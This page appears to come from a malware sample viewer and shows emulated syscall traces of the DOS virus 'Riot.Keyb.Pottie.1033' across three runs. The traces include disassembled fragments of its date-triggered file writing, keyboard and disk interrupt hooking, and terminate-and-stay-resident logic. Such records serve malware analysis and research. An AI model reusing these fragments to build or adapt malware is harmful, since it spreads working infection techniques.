Sample viewer

vx.netlux.org/Virus.DOS.Riot.Keyb.Pottie.1033

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:50:10.912026462Z	42	PC: 12f49 \| Get date 0x12f49: cmp dl, 0x11 0x12f4c: jne 0x12f90 0x12f4e: mov cx, 0x11 0x12f51: lea si, word ptr [bp + 0x497] 0x12f55: dec byte ptr [si] 0x12f57: inc si 0x12f58: loop 0x12f55 0x12f5a: mov ah, 0x3c 0x12f5c: xor cx, cx 0x12f5e: lea dx, word ptr [bp + 0x497] 0x12f62: int 0x21 0x12f64: push ax 0x12f65: mov ah, 0x2c 0x12f67: int 0x21 0x12f69: pop ax 0x12f6a: cmp dl, 0x31 0x12f6d: ja 0x12f82 0x12f6f: xchg ax, bx 0x12f70: mov ah, 0x40 0x12f72: mov cx, 0x51
2018-12-17T22:50:10.916039311Z	60	PC: 12f64 \| Create or truncate file
2018-12-17T22:50:11.263087505Z	44	PC: 12f69 \| Get time 0x12f69: pop ax 0x12f6a: cmp dl, 0x31 0x12f6d: ja 0x12f82 0x12f6f: xchg ax, bx 0x12f70: mov ah, 0x40 0x12f72: mov cx, 0x51 0x12f75: lea dx, word ptr [bp + 0x4a9] 0x12f79: int 0x21 0x12f7b: mov ah, 0x3e 0x12f7d: int 0x21 0x12f7f: jmp 0x13027 0x12f82: xchg ax, bx 0x12f83: mov ah, 0x40 0x12f85: mov cx, 0x47 0x12f88: lea dx, word ptr [bp + 0x450] 0x12f8c: int 0x21 0x12f8e: jmp 0x12f7b 0x12f90: mov ah, 0x2c 0x12f92: int 0x21 0x12f94: or dl, dl
2018-12-17T22:50:11.265850295Z	64	PC: 12f8e \| Write file or device (Write 71 bytes on handle 5)
2018-12-17T22:50:11.274660447Z	62	PC: 12f7f \| Close file
2018-12-17T22:50:11.282982962Z	9	PC: 12a47 \| Display string (String= 'Keyboard Locker (c) 1995 Pottie Rottie Press F12 to activate! ')
2018-12-17T22:50:11.290211533Z	53	PC: 12f32 \| Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:50:11.291851353Z	37	PC: 12f3b \| Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:50:11.294526569Z	53	PC: 12f32 \| Get interrupt vector (Interrupt = '40' AKA 'Random block write')
2018-12-17T22:50:11.296038029Z	37	PC: 12f3b \| Set interrupt vector (Interrupt = '40' AKA 'Random block write')
2018-12-17T22:50:11.297526415Z	53	PC: 12f32 \| Get interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-17T22:50:11.30008936Z	37	PC: 12f3b \| Set interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-17T22:50:11.301648019Z	53	PC: 12f32 \| Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:50:11.303211015Z	37	PC: 12f3b \| Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:50:11.305848571Z	52	PC: 12efe \| Get InDOS flag pointer
2018-12-17T22:50:11.308129315Z	73	PC: 12f19 \| Release memory
2018-12-17T22:50:11.309752544Z	9	PC: 12f20 \| Display string (Could not find end pointer)
2018-12-17T22:50:11.312402072Z	49	PC: 12f2e \| Terminate and stay resident (Return code = '0' \| Memory size = '87')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10137,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:27:16.892689945Z	42	PC: 12f49 \| Get date 0x12f49: cmp dl, 0x11 0x12f4c: jne 0x12f90 0x12f4e: mov cx, 0x11 0x12f51: lea si, word ptr [bp + 0x497] 0x12f55: dec byte ptr [si] 0x12f57: inc si 0x12f58: loop 0x12f55 0x12f5a: mov ah, 0x3c 0x12f5c: xor cx, cx 0x12f5e: lea dx, word ptr [bp + 0x497] 0x12f62: int 0x21 0x12f64: push ax 0x12f65: mov ah, 0x2c 0x12f67: int 0x21 0x12f69: pop ax 0x12f6a: cmp dl, 0x31 0x12f6d: ja 0x12f82 0x12f6f: xchg ax, bx 0x12f70: mov ah, 0x40 0x12f72: mov cx, 0x51
2018-12-25T12:27:16.895606333Z	44	PC: 12f94 \| Get time 0x12f94: or dl, dl 0x12f96: jne 0x12fa7 0x12f98: mov cx, 0x10 0x12f9b: lea si, word ptr [bp + 0x3a0] 0x12f9f: lodsb al, byte ptr cs:[si] 0x12fa1: xor al, 0x10 0x12fa3: int 0x29 0x12fa5: loop 0x12f9f 0x12fa7: mov ah, 0x4a 0x12fa9: mov bx, 0xffff 0x12fac: mov cx, 0xfead 0x12faf: int 0x21 0x12fb1: cmp ax, cx 0x12fb3: je 0x13027 0x12fb5: sub bx, 0x42 0x12fb8: mov ah, 0x4a 0x12fba: int 0x21 0x12fbc: mov ah, 0x48 0x12fbe: mov bx, 0x41 0x12fc1: int 0x21
2018-12-25T12:27:16.899249712Z	74	PC: 12fb1 \| Reallocate memory
2018-12-25T12:27:16.901341258Z	74	PC: 12fbc \| Reallocate memory
2018-12-25T12:27:16.903152225Z	72	PC: 12fc3 \| Allocate memory
2018-12-25T12:27:16.905886665Z	9	PC: 12a47 \| Display string (String= 'Keyboard Locker (c) 1995 Pottie Rottie Press F12 to activate! ')
2018-12-25T12:27:16.914077722Z	53	PC: 12f32 \| Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:16.915836941Z	37	PC: 12f3b \| Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:16.918661708Z	53	PC: 12f32 \| Get interrupt vector (See above)
2018-12-25T12:27:16.920350309Z	37	PC: 12f3b \| Set interrupt vector (See above)
2018-12-25T12:27:16.922006333Z	53	PC: 12f32 \| Get interrupt vector (See above)
2018-12-25T12:27:16.924381189Z	37	PC: 12f3b \| Set interrupt vector (See above)
2018-12-25T12:27:16.926357871Z	53	PC: 12f32 \| Get interrupt vector (See above)
2018-12-25T12:27:16.928223765Z	37	PC: 12f3b \| Set interrupt vector (See above)
2018-12-25T12:27:16.930715155Z	52	PC: 12efe \| Get InDOS flag pointer
2018-12-25T12:27:16.932111677Z	73	PC: 12f19 \| Release memory
2018-12-25T12:27:16.933612054Z	9	PC: 12f20 \| Display string (Could not find end pointer)
2018-12-25T12:27:16.936188454Z	49	PC: 12f2e \| Terminate and stay resident (Return code = '0' \| Memory size = '87')

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10137,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:27:17.567381879Z	42	PC: 12f49 \| Get date 0x12f49: cmp dl, 0x11 0x12f4c: jne 0x12f90 0x12f4e: mov cx, 0x11 0x12f51: lea si, word ptr [bp + 0x497] 0x12f55: dec byte ptr [si] 0x12f57: inc si 0x12f58: loop 0x12f55 0x12f5a: mov ah, 0x3c 0x12f5c: xor cx, cx 0x12f5e: lea dx, word ptr [bp + 0x497] 0x12f62: int 0x21 0x12f64: push ax 0x12f65: mov ah, 0x2c 0x12f67: int 0x21 0x12f69: pop ax 0x12f6a: cmp dl, 0x31 0x12f6d: ja 0x12f82 0x12f6f: xchg ax, bx 0x12f70: mov ah, 0x40 0x12f72: mov cx, 0x51
2018-12-25T12:27:17.570638536Z	60	PC: 12f64 \| Create or truncate file
2018-12-25T12:27:17.932574006Z	44	PC: 12f69 \| Get time 0x12f69: pop ax 0x12f6a: cmp dl, 0x31 0x12f6d: ja 0x12f82 0x12f6f: xchg ax, bx 0x12f70: mov ah, 0x40 0x12f72: mov cx, 0x51 0x12f75: lea dx, word ptr [bp + 0x4a9] 0x12f79: int 0x21 0x12f7b: mov ah, 0x3e 0x12f7d: int 0x21 0x12f7f: jmp 0x13027 0x12f82: xchg ax, bx 0x12f83: mov ah, 0x40 0x12f85: mov cx, 0x47 0x12f88: lea dx, word ptr [bp + 0x450] 0x12f8c: int 0x21 0x12f8e: jmp 0x12f7b 0x12f90: mov ah, 0x2c 0x12f92: int 0x21 0x12f94: or dl, dl
2018-12-25T12:27:17.935426972Z	64	PC: 12f8e \| Write file or device (Write 71 bytes on handle 5)
2018-12-25T12:27:17.945550797Z	62	PC: 12f7f \| Close file
2018-12-25T12:27:17.976786513Z	9	PC: 12a47 \| Display string (String= 'Keyboard Locker (c) 1995 Pottie Rottie Press F12 to activate! ')
2018-12-25T12:27:17.985298299Z	53	PC: 12f32 \| Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:17.987117905Z	37	PC: 12f3b \| Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:17.989981784Z	53	PC: 12f32 \| Get interrupt vector (See above)
2018-12-25T12:27:17.991728723Z	37	PC: 12f3b \| Set interrupt vector (See above)
2018-12-25T12:27:17.993487941Z	53	PC: 12f32 \| Get interrupt vector (See above)
2018-12-25T12:27:18.010023087Z	37	PC: 12f3b \| Set interrupt vector (See above)
2018-12-25T12:27:18.012772257Z	53	PC: 12f32 \| Get interrupt vector (See above)
2018-12-25T12:27:18.01463457Z	37	PC: 12f3b \| Set interrupt vector (See above)
2018-12-25T12:27:18.016519597Z	52	PC: 12efe \| Get InDOS flag pointer
2018-12-25T12:27:18.019614344Z	73	PC: 12f19 \| Release memory
2018-12-25T12:27:18.021539346Z	9	PC: 12f20 \| Display string (Could not find end pointer)
2018-12-25T12:27:18.024573333Z	49	PC: 12f2e \| Terminate and stay resident (Return code = '0' \| Memory size = '87')